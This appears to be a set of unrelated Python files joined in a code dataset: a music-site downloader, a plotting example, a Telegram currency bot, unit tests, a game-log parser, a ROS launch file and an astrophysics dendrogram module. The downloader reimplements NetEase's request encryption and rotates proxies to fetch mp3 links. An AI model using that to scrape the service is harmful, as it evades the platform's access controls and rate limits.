        self.HEADERS['Referer'] = url_163
        self.HEADERS['Cookie'] = 'appver=1.7.3'

    def read_link(self, link):
        """HTTP GET *link*, optionally through a fixed proxy or the proxy pool."""
        retVal = None
        requests_proxy = {}
        if self.proxy:
            requests_proxy = { 'http':self.proxy}
        if self.need_proxy_pool:
            requests_proxy = {'http':self.proxy_pool.get_proxy()}
            while True:
                try:
                    retVal = requests.get(link, headers=self.HEADERS, proxies=requests_proxy)
                    break
                except requests.exceptions.ConnectionError:
                    LOG.debug('invalid proxy detected, removing from pool')
                    # NOTE(review): `self.proxies` is not assigned anywhere in
                    # this class (the pool appears to live in
                    # `self.proxy_pool`); this branch likely raises
                    # AttributeError at runtime -- confirm.
                    self.proxies.del_proxy(requests_proxy['http'])
                    if self.proxies:
                        requests_proxy['http'] = self.proxies.get_proxy()
                    else:
                        LOG.debug('proxy pool is empty')
                        raise
                    # NOTE(review): this unconditional break prevents a retry
                    # with the replacement proxy; it looks misplaced.
                    break
        else:
            retVal = requests.get(link, headers=self.HEADERS, proxies=requests_proxy)
        return retVal

    def encrypt_dfsId(self,dfsId):
        """Obfuscate a dfsId (XOR with fixed key, md5, url-safe base64).

        Kept for reference; legacy mp3 urls used this scheme.
        """
        byte1 = bytearray('3go8&$8*3*3h0k(2)2')
        byte2 = bytearray(str(dfsId))
        byte1_len = len(byte1)
        for i in xrange(len(byte2)):
            byte2[i] = byte2[i]^byte1[i%byte1_len]
        m = md5.new()
        m.update(byte2)
        result = m.digest().encode('base64')[:-1]
        # url-safe base64 alphabet
        result = result.replace('/', '_')
        result = result.replace('+', '-')
        return result

    def createSecretKey(self, size):
        """Random hex string (truncated to 16 chars) used as the AES secret key."""
        return (''.join(map(lambda xx: (hex(ord(xx))[2:]), os.urandom(size))))[0:16]

    def encrypt_post_param(self,req_dict):
        """Build the encrypted `params`/`encSecKey` POST body for the weapi."""
        text = json.dumps(req_dict)
        secKey = self.createSecretKey(16)
        # Double AES: first with the fixed nonce, then with the fresh key;
        # the fresh key itself is RSA-encrypted into encSecKey.
        encText = util.aes_encrypt(util.aes_encrypt(text, nonce), secKey)
        encSecKey = util.rsa_encrypt(secKey, pubKey, modulus)
        result = {
            'params': encText,
            'encSecKey': encSecKey
        }
        return result

    def get_mp3_dl_link(self, song_id, bitrate):
        """Ask the weapi for the mp3 download url of *song_id* at *bitrate*."""
        req = {
            "ids": [song_id],
            "br": bitrate,
            "csrf_token": ""
        }
        page = requests.post(url_mp3_post, data=self.encrypt_post_param(req), headers=self.HEADERS, timeout=30, proxies={'http':self.proxy})
        result = page.json()["data"][0]["url"]
        return result
| StarcoderdataPython |
9791906 | # -*- coding: utf-8 -*-
"""
Tertiary example - Plotting sin3
===================================
This is a general example demonstrating a Matplotlib plot output, embedded
rST, the use of math notation and cross-linking to other examples. It would be
useful to compare with the
output below.
.. math::
x \\rightarrow \\sin(x)
Here the function :math:`\\sin` is evaluated at each point the variable
:math:`x` is defined.
"""
import numpy as np
import matplotlib.pyplot as plt
x = np.linspace(0, 2 * np.pi, 100)
y = np.sin(x)
plt.plot(x, y)
plt.xlabel('$x$')
plt.ylabel('$\sin(x)$')
# To avoid matplotlib text output
plt.show()
#%%
# To include embedded rST, use a line of >= 20 ``#``'s or ``#%%`` between your
# rST and your. This separates your example
# into distinct text and code blocks. You can continue writing code below the
# embedded rST text block:
print('This example shows a sin plot!')
#%%
from py_qs_example.mymodule import ExampleClass, example_function, less_important_function
ec = ExampleClass(5)
ec
#%%
output = example_function(ec, '_test')
output
#%%
# LaTeX syntax in the text blocks does not require backslashes to be escaped:
#
# .. math::
# \sin
#
# Cross referencing
# ^^^^^^^^^^^^^^^^^
#
# You can refer to an example from any part of the documentation,
# including from other examples. Sphinx-Gallery automatically creates reference
# labels for each example. The label consists of the ``.py`` file name,
# prefixed with ``sphx_glr_`` and the name of the
# folder(s) the example is in. In this case, the example we want to
# cross-reference is in ``auto_examples`` (the ``gallery_dirs``; see | StarcoderdataPython |
3581668 | import requests
from datetime import date, timedelta
"""
script to get the current exchange rate for currencies
via API from FIXER.IO
and send it via TELEGRAM to the user
this scripts runs once a day on PYTHONANYWHERE.COM
"""
#to FIXER.io
_ACCESS_KEY = 'YOUR_FIXER_IO_KEY'
#Telegram keys
_BOT_TOKEN = '<PASSWORD>'
_BOT_Chat_ID = 'CHAT_ID_ADRESSEE'
def telegram_bot_sendmessage(bot_token: str, bot_chatID: str, bot_message: str):
    """Send *bot_message* to a Telegram chat via the Bot API.

    Returns the decoded JSON response from Telegram.
    """
    api_url = f'https://api.telegram.org/bot{bot_token}/sendMessage'
    # ROBUSTNESS FIX: pass the message as a request parameter so requests
    # URL-encodes it; embedding the raw text in the URL broke on messages
    # containing '&', '#' or '+'.
    r = requests.get(api_url, params={
        'chat_id': bot_chatID,
        'parse_mode': 'Markdown',
        'text': bot_message,
    })
    return r.json()
def get_current_exchange_rate():
    """Return the latest EUR->GBP rate from the FIXER.io API."""
    # BUG FIX: the original f-string fragments embedded literal spaces around
    # the query parameters ('? access_key=...', '& format=1'), producing a
    # malformed request URL.
    web_api = (
        f'http://data.fixer.io/api/latest'
        f'?access_key={_ACCESS_KEY}'
        f'&format=1'
        f'&base=EUR'
        f'&symbols=GBP'
    )
    r = requests.get(web_api)
    return r.json()['rates']['GBP']
def get_weekly_high():
    """Return the lowest EUR->GBP rate of the past 7 days.

    A lower GBP-per-EUR rate means a stronger pound, i.e. the "best"
    exchange rate from the pound holder's point of view (the caller
    inverts it to EUR per GBP).
    """
    weekly_high = None
    for days_back in range(1, 8):
        hist_date = date.today() - timedelta(days=days_back)
        # BUG FIX: the original referenced the undefined name ACCESS_KEY
        # (NameError at runtime; the constant is _ACCESS_KEY) and embedded
        # literal spaces in the query string, corrupting the URL.
        web_api = (
            f'http://data.fixer.io/api/{hist_date}'
            f'?access_key={_ACCESS_KEY}'
            f'&base=EUR'
            f'&symbols=GBP'
        )
        r = requests.get(web_api)
        rate = r.json()['rates']['GBP']
        if weekly_high is None or rate < weekly_high:
            weekly_high = rate
    return weekly_high
if __name__ == '__main__':
    # Build the message: current rate plus the best rate of the last 7 days,
    # both quoted as EUR per GBP (hence the 1/rate inversion).
    message = (
        f'current exchange rate:\n 1 Pound = {1/get_current_exchange_rate():.3} Euro \n'
        f'best exchange rate last 7 days:\n 1 Pound = {1/get_weekly_high():.3} Euro'
    )
    #print(message)
    response = telegram_bot_sendmessage(_BOT_TOKEN, _BOT_Chat_ID, message)
    #print(response)
383729 | from spaceone.inventory.connector.aws_elasticache_connector.connector import ElastiCacheConnector
| StarcoderdataPython |
5049518 | import pymel.core as pm
import AETemplates as aetml
def unload_mtm_plugin():
    """Unload the mayatomantra plugin, flushing the scene before and after."""
    pm.newFile(force=True)
    is_loaded = pm.pluginInfo("mayatomantra.mll", query=True, loaded=True)
    if is_loaded:
        pm.unloadPlugin("mayatomantra.mll")
    pm.newFile(force=True)
def load_mtm_plugin():
    """Load the mayatomantra plugin if it is not already loaded."""
    already_loaded = pm.pluginInfo("mayatomantra.mll", query=True, loaded=True)
    if not already_loaded:
        pm.loadPlugin("mayatomantra.mll")
def testPlugin():
    """Smoke test: print the node type exposed by the AE template module.  (Python 2.)"""
    print aetml.AEdagNodeInclude.nodeType()
    print "Executing test"
8191741 | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for summary.py module.
"""
from __future__ import absolute_import, division, print_function
import os
import pandas as pd
import pytest
from causalimpact.summary import Summary
@pytest.fixture
def summary_data():
    """10-row summary DataFrame (average/cumulative columns) shared by the tests."""
    data = [
        [5.123, 10.456],
        [4.234, 9.567],
        [3.123, 8.456],
        [6.234, 9.567],
        [3.123, 10.456],
        [2.234, 4.567],
        [6.123, 9.456],
        [0.2345, 0.5678],
        [0.1234, 0.4567],
        [0.2345, 0.5678]
    ]
    data = pd.DataFrame(
        data,
        columns=['average', 'cumulative'],
        index=[
            'actual',
            'predicted',
            'predicted_lower',
            'predicted_upper',
            'abs_effect',
            'abs_effect_lower',
            'abs_effect_upper',
            'rel_effect',
            'rel_effect_lower',
            'rel_effect_upper'
        ]
    )
    return data
@pytest.fixture
def summarizer():
    """Fresh Summary instance for each test."""
    return Summary()
def test_summary_raises(summarizer):
    """summary() must fail before data is set and reject unknown output types."""
    # NOTE(review): the fixture argument is immediately shadowed by a fresh
    # Summary(); the fixture parameter could be dropped.
    summarizer = Summary()
    with pytest.raises(RuntimeError):
        summarizer.summary()
    with pytest.raises(ValueError):
        summarizer.summary_data = 'test'
        summarizer.summary('test')
def test_output_summary_single_digit(summary_data, fix_path, summarizer):
    """Summary table rendered with digits=1 matches the stored fixture file."""
    summarizer.summary_data = summary_data
    summarizer.alpha = 0.1
    summarizer.p_value = 0.459329
    result = summarizer.summary(digits=1)
    # NOTE(review): file handle is never closed; a with-block would be tidier.
    expected = open(os.path.join(
        fix_path, 'test_output_summary_single_digit')).read().strip()
    assert result == expected
def test_report_summary_single_digit(summary_data, fix_path, summarizer):
    """Report output with digits=1: positive effect without significance."""
    # detected positive signal but with no significance.
    summarizer.summary_data = summary_data
    summarizer.alpha = 0.1
    summarizer.p_value = 0.5
    # NOTE(review): chained assignment (df[col][row] = x) relies on the column
    # Series being a view of the frame; under pandas copy-on-write this
    # silently stops mutating the DataFrame -- confirm pandas version pinning.
    summary_data['average']['rel_effect'] = 0.41
    summary_data['average']['rel_effect_lower'] = -0.30
    summary_data['average']['rel_effect_upper'] = 0.30
    result = summarizer.summary(output='report', digits=1)
    expected = open(os.path.join(
        fix_path, 'test_report_summary_single_digit')).read().strip()
    assert result == expected
def test_output_summary_1(summary_data, fix_path, summarizer):
    """Default summary table rendering matches the stored fixture file."""
    summarizer.summary_data = summary_data
    summarizer.alpha = 0.1
    summarizer.p_value = 0.459329
    result = summarizer.summary()
    expected = open(os.path.join(fix_path, 'test_output_summary_1')).read().strip()
    assert result == expected
def test_report_summary_1(summary_data, fix_path, summarizer):
    """Report: positive effect, not statistically significant (p=0.5)."""
    # detected positive signal but with no significance.
    summarizer.summary_data = summary_data
    summarizer.alpha = 0.1
    summarizer.p_value = 0.5
    # Mutating summary_data here also mutates summarizer.summary_data,
    # since both names refer to the same DataFrame.
    summary_data['average']['rel_effect'] = 0.41
    summary_data['average']['rel_effect_lower'] = -0.30
    summary_data['average']['rel_effect_upper'] = 0.30
    result = summarizer.summary(output='report')
    expected = open(os.path.join(fix_path, 'test_report_summary_1')).read().strip()
    assert result == expected
def test_report_summary_2(summary_data, fix_path, summarizer):
    """Report: positive effect with statistical significance (p=0.05)."""
    # detected positive signal with significance.
    summarizer.summary_data = summary_data
    summarizer.alpha = 0.1
    summarizer.p_value = 0.05
    summary_data['average']['rel_effect'] = 0.41
    # NOTE(review): lower (0.434) exceeds upper (0.234) here -- looks like the
    # two fixture values were swapped; the expected-output file encodes the
    # same values, so the test still passes. Confirm intent.
    summary_data['average']['rel_effect_lower'] = 0.434
    summary_data['average']['rel_effect_upper'] = 0.234
    result = summarizer.summary(output='report')
    expected = open(os.path.join(fix_path, 'test_report_summary_2')).read().strip()
    assert result == expected
def test_report_summary_3(summary_data, fix_path, summarizer):
    """Report: negative effect, not statistically significant (p=0.5)."""
    # detected negative signal but with no significance.
    summary_data['average']['rel_effect'] = -0.343
    summary_data['average']['rel_effect_lower'] = -0.434
    summary_data['average']['rel_effect_upper'] = 0.234
    summarizer.summary_data = summary_data
    summarizer.alpha = 0.1
    summarizer.p_value = 0.5
    result = summarizer.summary(output='report')
    expected = open(os.path.join(fix_path, 'test_report_summary_3')).read().strip()
    assert result == expected
def test_report_summary_4(summary_data, fix_path, summarizer):
    """Report: negative effect with statistical significance (p=0.05)."""
    # detected negative signal with significance.
    summary_data['average']['rel_effect'] = -0.343
    summary_data['average']['rel_effect_lower'] = -0.434
    summary_data['average']['rel_effect_upper'] = -0.234
    summarizer.summary_data = summary_data
    summarizer.alpha = 0.1
    summarizer.p_value = 0.05
    result = summarizer.summary(output='report')
    expected = open(os.path.join(fix_path, 'test_report_summary_4')).read().strip()
    assert result == expected
| StarcoderdataPython |
3248887 | <reponame>IL2HorusTeam/il2fb-ds-events-parser
import datetime
import re
from typing import Optional
from il2fb.commons.actors import HumanAircraftActor
from il2fb.commons.spatial import Point3D
from il2fb.ds.events.definitions.takeoff import HumanAircraftTookOffEvent
from il2fb.ds.events.definitions.takeoff import HumanAircraftTookOffInfo
from .base import LineWithTimestampParser
from .text import strip_spaces
from .regex import HUMAN_AIRCRAFT_REGEX
from .regex import POS_REGEX
from ._utils import export
HUMAN_AIRCRAFT_TOOK_OFF_REGEX = re.compile(
rf"^{HUMAN_AIRCRAFT_REGEX} in flight at {POS_REGEX}$"
)
@export
class HumanAircraftTookOffLineParser(LineWithTimestampParser):
    """
    Parses gamelog messages about take-off events.

    Examples of input lines:

      "TheUser:TB-7_M40F in flight at 145663.6 62799.64"
      "TheUser:TB-7_M40F in flight at 145663.6 62799.64 83.96088"
      " The User :TB-7_M40F in flight at 145663.6 62799.64 83.96088"
      " :TB-7_M40F in flight at 145663.6 62799.64 83.96088"
      ":TB-7_M40F in flight at 145663.6 62799.64 83.96088"
    """

    def parse_line(self, timestamp: datetime.datetime, line: str) -> Optional[HumanAircraftTookOffEvent]:
        matched = HUMAN_AIRCRAFT_TOOK_OFF_REGEX.match(line)
        if matched is None:
            return None

        actor = HumanAircraftActor(
            callsign=strip_spaces(matched.group('callsign')),
            aircraft=matched.group('aircraft'),
        )
        # The z coordinate is optional in the log format; default it to 0.
        pos = Point3D(
            x=float(matched.group('x')),
            y=float(matched.group('y')),
            z=float(matched.group('z') or 0),
        )
        info = HumanAircraftTookOffInfo(
            timestamp=timestamp,
            actor=actor,
            pos=pos,
        )
        return HumanAircraftTookOffEvent(info)
| StarcoderdataPython |
8029785 | <filename>server/athenian/api/models/web/organization.py<gh_stars>1-10
from typing import Optional
from athenian.api.models.web.base_model_ import Model
class Organization(Model):
    """GitHub organization details."""

    # OpenAPI-generator style metadata: declared attribute types and the
    # attribute -> JSON field name map.
    openapi_types = {
        "name": str,
        "avatar_url": str,
        "login": str,
    }

    attribute_map = {
        "name": "name",
        "avatar_url": "avatar_url",
        "login": "login",
    }

    def __init__(self,
                 name: Optional[str] = None,
                 avatar_url: Optional[str] = None,
                 login: Optional[str] = None):
        """Organization - a model defined in OpenAPI

        :param name: The name of this Organization.
        :param avatar_url: The avatar_url of this Organization.
        :param login: The login of this Organization.
        """
        # NOTE(review): assigns the private fields directly, bypassing the
        # setters' None checks -- a freshly constructed instance may hold
        # None values that the setters would reject.
        self._name = name
        self._avatar_url = avatar_url
        self._login = login

    @property
    def name(self) -> str:
        """Gets the name of this Organization.

        :return: The name of this Organization.
        """
        return self._name

    @name.setter
    def name(self, name: str):
        """Sets the name of this Organization.

        :param name: The name of this Organization.
        :raises ValueError: if ``name`` is None.
        """
        if name is None:
            raise ValueError("Invalid value for `name`, must not be `None`")
        self._name = name

    @property
    def avatar_url(self) -> str:
        """Gets the avatar_url of this Organization.

        :return: The avatar_url of this Organization.
        """
        return self._avatar_url

    @avatar_url.setter
    def avatar_url(self, avatar_url: str):
        """Sets the avatar_url of this Organization.

        :param avatar_url: The avatar_url of this Organization.
        :raises ValueError: if ``avatar_url`` is None.
        """
        if avatar_url is None:
            raise ValueError("Invalid value for `avatar_url`, must not be `None`")
        self._avatar_url = avatar_url

    @property
    def login(self) -> str:
        """Gets the login of this Organization.

        :return: The login of this Organization.
        """
        return self._login

    @login.setter
    def login(self, login: str):
        """Sets the login of this Organization.

        :param login: The login of this Organization.
        :raises ValueError: if ``login`` is None.
        """
        if login is None:
            raise ValueError("Invalid value for `login`, must not be `None`")
        self._login = login
| StarcoderdataPython |
8165105 | # Good morning! Here's your coding interview problem for today.
# This problem was asked by Jane Street.
# cons(a, b) constructs a pair, and car(pair) and cdr(pair) returns the first and last element of that pair.
# For example, car(cons(3, 4)) returns 3, and cdr(cons(3, 4)) returns 4.
# Given this implementation of cons:
def cons(a, b):
    """Return a Church-encoded pair holding (a, b).

    The pair is a function that applies its argument to both elements.
    """
    return lambda f: f(a, b)
# Implement car and cdr.
def car(f):
    """Return the first element of a pair built by cons."""
    return f(lambda a, b: a)
def cdr(f):
    """Return the last element of a pair built by cons."""
    return f(lambda a, b: b)
print( car(cons(3, 4)))
print (cdr(cons(3, 4))) | StarcoderdataPython |
3364597 | <filename>hello_world_cpp/launch/talker_listener_singleprocess.launch.py
import launch
from launch_ros.actions import ComposableNodeContainer
from launch_ros.descriptions import ComposableNode
def generate_launch_description():
    """Launch the talker and listener as composed nodes in one container process."""
    container = ComposableNodeContainer(
        # NOTE(review): the node_* keyword spellings are the pre-Foxy API;
        # newer launch_ros releases renamed them (name=, namespace=,
        # executable=, plugin=) -- confirm the targeted ROS 2 distro.
        node_name = 'my_container',
        node_namespace = '',
        package = 'rclcpp_components',
        node_executable = 'component_container',
        composable_node_descriptions = [
            ComposableNode(
                package = 'hello_world_cpp',
                node_plugin = 'hello_world_cpp::Talker',
                node_name = 'talker'
            ),
            ComposableNode(
                package = 'hello_world_cpp',
                node_plugin = 'hello_world_cpp::Listener',
                node_name = 'listener'
            )
        ],
        output = 'screen',
    )
    return launch.LaunchDescription([container])
| StarcoderdataPython |
8046504 | <reponame>Anancha/Programming-Techniques-using-Python
def mydecorator(myfunc):
    """Decorator that intercepts calls made with the name "Michael".

    For "Michael" a special message is printed instead of calling the
    wrapped function; every other name is passed through unchanged.
    """
    from functools import wraps  # local import keeps this snippet self-contained

    @wraps(myfunc)  # IDIOM FIX: preserve the wrapped function's metadata
    def func1(myname):
        if myname == "Michael":
            print("Hello", myname, "!Your functionality is extended!")
        else:
            myfunc(myname)
    return func1
@mydecorator
def greet(myname):
    """Greet *myname*; the decorator overrides the greeting for Michael."""
    print(f"HI! {myname} !Welcome to learning decorators!")
greet('Tom')
greet('Latham')
greet('Michael') | StarcoderdataPython |
11200918 | <reponame>fsi-sandbox/fsi-sdk-python
class Union:
    """Thin holder for FSI sandbox connection settings (base URL + headers)."""

    def __init__(self, params):
        """Extract the base URL and the request headers from *params*.

        Expects the keys 'base_url', 'Sandbox-Key' and 'Content-Type'.
        """
        self.url = params["base_url"]
        self.headers = {
            "Sandbox-Key": params["Sandbox-Key"],
            "Content-Type": params["Content-Type"],
        }
| StarcoderdataPython |
6660004 | # Licensed under an MIT open source license - see LICENSE
from __future__ import print_function, absolute_import, division
'''
Dendrogram statistics as described in Burkhart et al. (2013)
Two statistics are contained:
* number of leaves + branches vs. $\delta$ parameter
* statistical moments of the intensity histogram
Requires the astrodendro package (http://github.com/astrodendro/dendro-core)
'''
import numpy as np
from warnings import warn
import statsmodels.api as sm
from astropy.utils.console import ProgressBar
import warnings
try:
from astrodendro import Dendrogram, periodic_neighbours
astrodendro_flag = True
except ImportError:
Warning("Need to install astrodendro to use dendrogram statistics.")
astrodendro_flag = False
from ..stats_utils import hellinger, common_histogram_bins, standardize
from ..base_statistic import BaseStatisticMixIn
from ...io import common_types, threed_types, twod_types
from .mecdf import mecdf
class Dendrogram_Stats(BaseStatisticMixIn):
    """
    Dendrogram statistics as described in Burkhart et al. (2013)

    Two statistics are contained:
    * number of leaves & branches vs. :math:`\delta` parameter
    * statistical moments of the intensity histogram

    Parameters
    ----------
    data : %(dtypes)s
        Data to create the dendrogram from.
    min_deltas : {`~numpy.ndarray`, 'auto', None}, optional
        Minimum deltas of leaves in the dendrogram. Multiple values must
        be given in increasing order to correctly prune the dendrogram.
        The default estimates delta levels from percentiles in the data.
    dendro_params : dict
        Further parameters for the dendrogram algorithm
        (see www.dendrograms.org for more info).
    num_deltas : int, optional
        Number of min_delta values to use when `min_delta='auto'`.
    """

    __doc__ %= {"dtypes": " or ".join(common_types + twod_types +
                                      threed_types)}

    def __init__(self, data, header=None, min_deltas='auto',
                 dendro_params=None, num_deltas=10):
        super(Dendrogram_Stats, self).__init__()

        if not astrodendro_flag:
            raise ImportError("astrodendro must be installed to use "
                              "Dendrogram_Stats.")

        self.input_data_header(data, header)

        if dendro_params is None:
            # Defaults for the astrodendro computation; see the astrodendro
            # docs for what each parameter controls.
            self.dendro_params = {"min_npix": 10,
                                  "min_value": 0.001,
                                  "min_delta": 0.1}
        else:
            self.dendro_params = dendro_params

        if min_deltas == 'auto':
            self.autoset_min_deltas(num=num_deltas)
        else:
            self.min_deltas = min_deltas

    @property
    def min_deltas(self):
        '''
        Array of min_delta values to compute the dendrogram.
        '''
        return self._min_deltas

    @min_deltas.setter
    def min_deltas(self, value):
        # In the case where only one min_delta is given
        if "min_delta" in self.dendro_params and value is None:
            self._min_deltas = np.array([self.dendro_params["min_delta"]])
        else:
            # FIX: coerce to a 1D float array *before* checking monotonicity.
            # Previously a scalar hit np.diff (which requires >= 1-D input)
            # and a list was wrapped as np.array([value]), yielding a 2-D
            # array that broke all downstream indexing.
            arr = np.atleast_1d(np.asarray(value, dtype=float))

            # Multiple values given. Ensure they are in increasing order
            if arr.size > 1 and not (np.diff(arr) > 0).all():
                raise ValueError("Multiple values of min_delta must be given "
                                 "in increasing order.")

            self._min_deltas = arr

    def autoset_min_deltas(self, num=10):
        '''
        Create an array delta values that the dendrogram will be pruned to.

        Creates equally-spaced delta values between the minimum value set in
        `~Dendrogram_Stats.dendro_params` and the maximum in the data. The last
        delta (which would only occur at the peak in the data) is removed.

        Parameters
        ----------
        num : int, optional
            Number of delta values to create.
        '''
        min_val = self.dendro_params.get('min_value', -np.inf)
        min_delta = self.dendro_params.get('min_delta', 1e-5)

        # Calculate the ptp above the min_val
        ptp = np.nanmax(self.data[self.data > min_val]) - min_val

        # num + 1 points, then drop the last (the data peak itself).
        self.min_deltas = np.linspace(min_delta, ptp, num + 1)[:-1]

    def compute_dendro(self, show_progress=False, save_dendro=False,
                       dendro_name=None, dendro_obj=None,
                       periodic_bounds=False):
        '''
        Compute the dendrogram and prune to the minimum deltas.

        ** min_deltas must be in ascending order! **

        Parameters
        ----------
        show_progress : optional, bool
            Enables the progress bar in astrodendro.
        save_dendro : optional, bool
            Saves the dendrogram in HDF5 format. **Requires pyHDF5**
        dendro_name : str, optional
            Save name when save_dendro is enabled. ".hdf5" appended
            automatically.
        dendro_obj : Dendrogram, optional
            Input a pre-computed dendrogram object. It is assumed that
            the dendrogram has already been computed!
        periodic_bounds : bool, optional
            Enable when the data is periodic in the spatial dimensions.
        '''
        # NOTE(review): save_dendro / dendro_name are accepted but never used
        # in this body — confirm whether saving was meant to happen here.
        self._numfeatures = np.empty(self.min_deltas.shape, dtype=int)
        self._values = []

        if dendro_obj is None:
            if periodic_bounds:
                # Find the spatial dimensions
                num_axes = self.data.ndim
                spat_axes = []
                for i, axis_type in enumerate(self._wcs.get_axis_types()):
                    if axis_type["coordinate_type"] == u"celestial":
                        spat_axes.append(num_axes - i - 1)
                neighbours = periodic_neighbours(spat_axes)
            else:
                neighbours = None

            d = Dendrogram.compute(self.data, verbose=show_progress,
                                   min_delta=self.min_deltas[0],
                                   min_value=self.dendro_params["min_value"],
                                   min_npix=self.dendro_params["min_npix"],
                                   neighbours=neighbours)
        else:
            d = dendro_obj

        self._numfeatures[0] = len(d)
        self._values.append(np.array([struct.vmax for struct in
                                      d.all_structures]))

        if len(self.min_deltas) > 1:

            # Another progress bar for pruning steps
            if show_progress:
                print("Pruning steps.")
                bar = ProgressBar(len(self.min_deltas[1:]))

            # Ascending min_deltas let us prune the same tree repeatedly
            # instead of recomputing it from scratch at each level.
            for i, delta in enumerate(self.min_deltas[1:]):
                d.prune(min_delta=delta)
                self._numfeatures[i + 1] = len(d)
                self._values.append(np.array([struct.vmax for struct in
                                              d.all_structures]))

                if show_progress:
                    bar.update(i + 1)

    @property
    def numfeatures(self):
        '''
        Number of branches and leaves at each value of min_delta
        '''
        return self._numfeatures

    @property
    def values(self):
        '''
        Array of peak intensity values of leaves and branches at all values of
        min_delta.
        '''
        return self._values

    def make_hists(self, min_number=10, **kwargs):
        '''
        Creates histograms based on values from the tree.
        *Note:* These histograms are remade when calculating the distance to
        ensure the proper form for the Hellinger distance.

        Parameters
        ----------
        min_number : int, optional
            Minimum number of structures needed to create a histogram.
        '''
        # FIX: pop 'bins' once, outside the loop. It was previously popped on
        # the first iteration only, so every later delta level silently fell
        # back to the sqrt(N) rule even when the caller supplied bins.
        user_bins = kwargs.pop('bins', None)

        hists = []

        for value in self.values:

            if len(value) < min_number:
                # Placeholder (empty bins, empty counts) for sparse levels.
                hists.append([np.zeros((0, ))] * 2)
                continue

            if user_bins is None:
                bins = int(np.sqrt(len(value)))
            else:
                bins = user_bins

            hist, bins = np.histogram(value, bins=bins, **kwargs)
            bin_cents = (bins[:-1] + bins[1:]) / 2
            hists.append([bin_cents, hist])

        self._hists = hists

    @property
    def hists(self):
        '''
        Histogram values and bins computed from the peak intensity in all
        structures. One set of values and bins are returned for each value
        of `~Dendro_Statistics.min_deltas`
        '''
        return self._hists

    def fit_numfeat(self, size=5, verbose=False):
        '''
        Fit a line to the power-law tail. The break is approximated using
        a moving window, computing the standard deviation. A spike occurs at
        the break point.

        Parameters
        ----------
        size : int. optional
            Size of std. window. Passed to std_window.
        verbose : bool, optional
            Shows the model summary.
        '''
        if len(self.numfeatures) == 1:
            raise ValueError("Multiple min_delta values must be provided to "
                             "perform fitting. Only one value was given.")

        # Remove points where there is only 1 feature or less.
        nums = self.numfeatures[self.numfeatures > 1]
        deltas = self.min_deltas[self.numfeatures > 1]

        # Find the position of the break
        break_pos = std_window(nums, size=size)
        self.break_pos = deltas[break_pos]

        # Still enough point to fit to?
        if len(deltas[break_pos:]) < 2:
            raise ValueError("Too few points to fit. Try running with more "
                             "min_deltas or lowering the std. window size.")

        self._fitvals = [np.log10(deltas[break_pos:]),
                         np.log10(nums[break_pos:])]

        x = sm.add_constant(self.fitvals[0])

        # HC3 gives heteroscedasticity-robust standard errors.
        self._model = sm.OLS(self.fitvals[1], x).fit(cov_type='HC3')

        if verbose:
            print(self.model.summary())

        errors = self.model.bse

        self._tail_slope = self.model.params[-1]
        self._tail_slope_err = errors[-1]

    @property
    def model(self):
        '''
        Power-law tail fit model.
        '''
        return self._model

    @property
    def fitvals(self):
        '''
        Log values of delta and number of structures used for the power-law
        tail fit.
        '''
        return self._fitvals

    @property
    def tail_slope(self):
        '''
        Slope of power-law tail.
        '''
        return self._tail_slope

    @property
    def tail_slope_err(self):
        '''
        1-sigma error on slope of power-law tail.
        '''
        return self._tail_slope_err

    @staticmethod
    def load_dendrogram(hdf5_file, min_deltas=None):
        '''
        Load in a previously saved dendrogram. **Requires pyHDF5**

        Parameters
        ----------
        hdf5_file : str
            Name of saved file.
        min_deltas : numpy.ndarray or list
            Minimum deltas of leaves in the dendrogram.
        '''
        dendro = Dendrogram.load_from(hdf5_file)

        # Renamed from "self": a staticmethod has no instance, and naming a
        # local "self" was misleading.
        stats = Dendrogram_Stats(dendro.data, min_deltas=min_deltas,
                                 dendro_params=dendro.params)

        return stats

    def plot_fit(self, save_name=None, show_hists=True, color='r',
                 fit_color='k', symbol='o'):
        '''
        Plot the power-law tail fit and (optionally) the peak-intensity
        histograms.

        Parameters
        ----------
        save_name : str,optional
            Save the figure when a file name is given.
        show_hists : bool, optional
            Plot the histograms of intensity. Requires
            `~Dendrogram_Stats.make_hists` to be run first.
        color : {str, RGB tuple}, optional
            Color to show the delta-variance curve in.
        fit_color : {str, RGB tuple}, optional
            Color of the fitted line. Defaults to `color` when no input is
            given.
        symbol : str, optional
            Marker used for the data points.
        '''
        import matplotlib.pyplot as plt

        if not show_hists:
            ax1 = plt.subplot(111)
        else:
            ax1 = plt.subplot(121)

        if fit_color is None:
            fit_color = color

        ax1.plot(self.fitvals[0], self.fitvals[1], symbol, color=color)
        ax1.plot(self.fitvals[0], self.model.fittedvalues, color=fit_color)

        plt.xlabel(r"log $\delta$")
        plt.ylabel(r"log Number of Features")

        if show_hists:
            ax2 = plt.subplot(122)

            if not hasattr(self, "_hists"):
                raise ValueError("Histograms were not computed with "
                                 "Dendrogram_Stats.make_hists. Cannot plot.")

            for bins, vals in self.hists:
                if bins.size < 1:
                    continue
                bin_width = np.abs(bins[1] - bins[0])
                ax2.bar(bins, vals, align="center",
                        width=bin_width, alpha=0.25,
                        color=color)
            plt.xlabel("Data Value")

        plt.tight_layout()

        if save_name is not None:
            plt.savefig(save_name)
            plt.close()
        else:
            plt.show()

    def run(self, periodic_bounds=False, verbose=False, save_name=None,
            show_progress=True, dendro_obj=None, save_results=False,
            output_name=None, fit_kwargs=None, make_hists=True,
            hist_kwargs=None):
        '''
        Compute dendrograms. Necessary to maintain the package format.

        Parameters
        ----------
        periodic_bounds : bool or list, optional
            Enable when the data is periodic in the spatial dimensions. Passing
            a two-element list can be used to individually set how the
            boundaries are treated for the datasets.
        verbose : optional, bool
            Enable plotting of results.
        save_name : str,optional
            Save the figure when a file name is given.
        show_progress : optional, bool
            Enables progress bars while making the dendrogram.
        dendro_obj : Dendrogram, optional
            Pass a pre-computed dendrogram object. **MUST have min_delta set
            at or below the smallest value in`~Dendro_Statistics.min_deltas`.**
        save_results : bool, optional
            Save the statistic results as a pickle file. See
            `~Dendro_Statistics.save_results`.
        output_name : str, optional
            Filename used when `save_results` is enabled. Must be given when
            saving.
        fit_kwargs : dict, optional
            Passed to `~Dendro_Statistics.fit_numfeat`.
        make_hists : bool, optional
            Enable computing histograms.
